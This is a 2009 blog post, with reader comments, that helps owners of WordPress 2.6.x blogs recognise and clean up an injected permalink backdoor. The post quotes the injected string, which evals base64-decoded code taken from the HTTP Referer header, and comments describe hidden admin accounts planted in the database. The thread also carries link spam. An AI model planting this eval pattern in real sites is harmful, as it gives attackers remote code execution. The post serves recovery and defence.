About Andrew Wee
Andrew Wee | Blogging | Affiliate Marketing | Social Traffic Generation | Internet Marketing

BizExcellerated Internet Marketing: Achieve mastery in blogging, affiliate marketing, social traffic generation at Andrew Wee

URGENT: If Your WordPress Blog is Acting Strangely, Follow These Steps

I checked my blog and the URLs looked malformed, with the following structure: http://www.whoisandrewwee.com/2009/09/03/unlocking-unconventional-traffic-sources-for-affiliate-campaigns/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_REFERER%5D))%7D%7D|.+)&%/#comment-506929

If you notice something similar or weird with your WordPress blog, you might want to take the following steps:

  • Check the “users” tab from the WP admin interface
  • Remove any unfamiliar users, esp those marked as “administrator”
  • To prevent users from registering, I’d go as far as to remove wp-register.php (keep a backup and FTP it back in if you have problems)
  • Check all of WordPress’ PHP scripts, remove global “execute” privileges

Once you’ve secured the perimeter, look at the “Settings” and “permalinks” tab.

If you see some weird stuff like “%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_REFERER%5D))%7D%7D|.+)&%/#comment-506929″, you’d want to clear that, and replace it with your original permalink structure, or look it up on the WordPress codex.

You can also check out this other blog post for more details.

Note: this issue seems to be affecting WordPress 2.6.x. Not sure to what extent it’s affecting version 2.8.x.

UPDATE: Matt Mullenweg from the WordPress development team has posted about the security issues if you’re using an older version of WordPress. Here’s a WP support forum write up about what might be happening.

You might want to upgrade to a newer version of WordPress. Just take note that some of your plugins/themes might not work if the developer hasn’t updated the plugin for compliance with the newest version.

27 comments on URGENT: If Your WordPress Blog is Acting Strangely, Follow These Steps

  1. BrianB
    September 5, 2009 at 3:22 am (6 years ago)

    We got it, too. Is this a world wide problem? I googled the change script and it seems a few similar problems have popped out recently.

  2. Andrea_R
    September 5, 2009 at 4:00 am (6 years ago)

    Thanks for this post – we’ve seen it three times today, not sure what versions were running.

  3. mougela
    September 5, 2009 at 4:35 am (6 years ago)

    Thank you, it helped me tonight !! :)

  4. Mr Woc
    September 5, 2009 at 5:09 am (6 years ago)

    Hi there

    Many thanks for this information, I was at my wits end trying to resolve this lol, I think mine occured because of installing the seo plugin pack, but doing what you said on this post worked fine !


  5. Edward Mills
    September 5, 2009 at 5:37 am (6 years ago)

    They got me. Thanks for the info on how to clean it up. Wasn’t as cut and dried as you made it sound… had some trouble with my htaccess file. But it’s all good now!

  6. KirstyM
    September 5, 2009 at 6:12 am (6 years ago)

    Thanks so much Andrew, my blog was also similarly affected and I’ve followed your instructions to fix the issue. I’d have been completely stumped without this post.

    Wonder if they’re targeting online marketers, the rotters?!

  7. KirstyM
    September 5, 2009 at 7:20 am (6 years ago)

    Andrew – a colleague also affected has just told me that most people affected will also have had a new admin inserted directly into their SQL database that doesn’t show up in WordPress interface.

    I found this had been placed into my SQL db, it has obviously been stored for later foul internet deeds to be performed…

  8. Andrew Wee
    September 5, 2009 at 8:49 am (6 years ago)

    Hi Kirsty,
    Thanks for that. I’ll drop a note to my server admin.

    For those who’re using fantastico/cPanel, it should be an easy fix from the “mySQL database” or “phpMyAdmin” consoles.

  9. Luke Rumley
    September 5, 2009 at 1:28 pm (6 years ago)

    Lots more going on beneath the surface! Permalinks and hidden admin users! This blog post worked for me to clean house: http://blog.nachotech.com/?p=125

    I also renamed my xmlrpc.php and wp-register.php files as a stop-gap solution. It seems 2.8.4 blogs are safe so far. I am guessing 2.8.5 will be out ASAP to correct this is 2.8.4 doesn’t.

  10. Melayu
    September 5, 2009 at 1:43 pm (6 years ago)

    This post is very good for me.. i can get many tips and trick on this blog.. thank’s for u’r information my friend! this is my first time to visiting to your blog..

  11. Machja
    January 5, 2010 at 5:26 am (6 years ago)

    Thanks for your post! I just had the problem. :(

  12. Dire
    May 26, 2010 at 6:37 am (6 years ago)

    Thanx a lot! Really works!

  13. Erik
    March 10, 2011 at 3:51 am (5 years ago)

    This helps! Thank you! I was trying to figure out these problems the other day!

  14. doudoututu
    September 9, 2011 at 8:07 pm (4 years ago)

    I just could not depart your web website before suggesting that I really enjoyed the usual information a person offer on your visitors? Is going to be back continuously to check out new posts.

  15. jDxOeU
    January 5, 2013 at 8:20 am (3 years ago)

    wyXfmbFltkZ Isabel Marant Boots wgWfheLqdiT Isabel Marant Sneakers wrLqgbFmfgY http://www.isabelmarantbootsneakersz.com/
    wtZwblZmusV Hyperfuse 2012 wlMfdtUickH Nike Hyperdunk 2012 wdLyktLtsdX http://hyperdunk2012.weebly.com/
    wcXcjxOiklJ Jordans Retro Shoes wjRvobSorbZ New Jordan 2012 Shoes weKbnhRxtpP http://www.cheapjordanshoez.com/
    wbThhuDpzfN Jordan 11 wrHoosRelnH Jordan 11 Concord wsJydbWbbcZ http://www.jordan11concordbred.com/
    wqJbtqUajdR nike air penny 5 wpFtxnHaqcI air penny 5 wuSgfsRsmpF http://nikeairpenny5.weebly.com/
    wfGotlQbvcF nike air penny 5 whBmrjGaqzE penny 5 wkYwzxJeduA http://airpenny5s.com/
    wpZbohZfooW isabel marant boots wtDiywHnciX isabel marant sneakers wfEwllNzdpP http://isabelmarantsneakers2012z.weebly.com/
    waTsnmObquH Black Foamposites wtHuooKvfsO Foamposites For Sale woMojlLvsyN http://www.cheapfoampositez2013.com/

  16. pokemonxetyrom
    March 29, 2014 at 3:22 am (2 years ago)

    This helps! Thank you! I was trying to figure out these problems the other day!

  17. Kassie
    November 5, 2015 at 9:55 am (3 months ago)

    Thanks for sharing your thoughts about blogging.


  18. baby formula brands
    November 6, 2015 at 7:30 pm (3 months ago)

    Pretty nice post. I simply stumbled upon your weblog and wanted to mention that I’ve really loved
    surfing around your weblog posts. After all I’ll be subscribing in your feed and I am hoping you write again soon!

  19. holywood
    November 17, 2015 at 1:19 pm (3 months ago)

    Aw, this was an extremely nice post. Taking the time and actual effort to generate a really good article… but what can I say… I
    put things off a whole lot and never manage to get nearly anything done.

  20. metu.tv
    December 25, 2015 at 9:47 am (1 month ago)

    Hi there would you mind letting me know which web host you’re working with?
    I’ve loaded your blog in 3 different internet browsers and I must say this blog loads a lot faster
    then most. Can you suggest a good web hosting provider at a honest price?
    Thanks a lot, I appreciate it!

  21. Yetta
    December 27, 2015 at 12:44 am (1 month ago)

    I happen to be writing to let you know what a nice experience
    my cousin’s girl enjoyed using your blog. She noticed so many details,
    which included what it is like to possess a very
    effective coaching spirit to get other people with no
    trouble have an understanding of a number of extremely tough issues.
    You undoubtedly exceeded our expectations. I appreciate you for distributing such practical,
    trusted, edifying and in addition easy tips about that topic to Kate.

  22. security services Of america
    January 25, 2016 at 9:45 am (2 weeks ago)

    What’s up to every one, for the reason that I am genuinely eager
    of reading this blog’s post to be updated daily. It includes nice information.

4 Pingbacks & Trackbacks on URGENT: If Your WordPress Blog is Acting Strangely, Follow These Steps

Leave a reply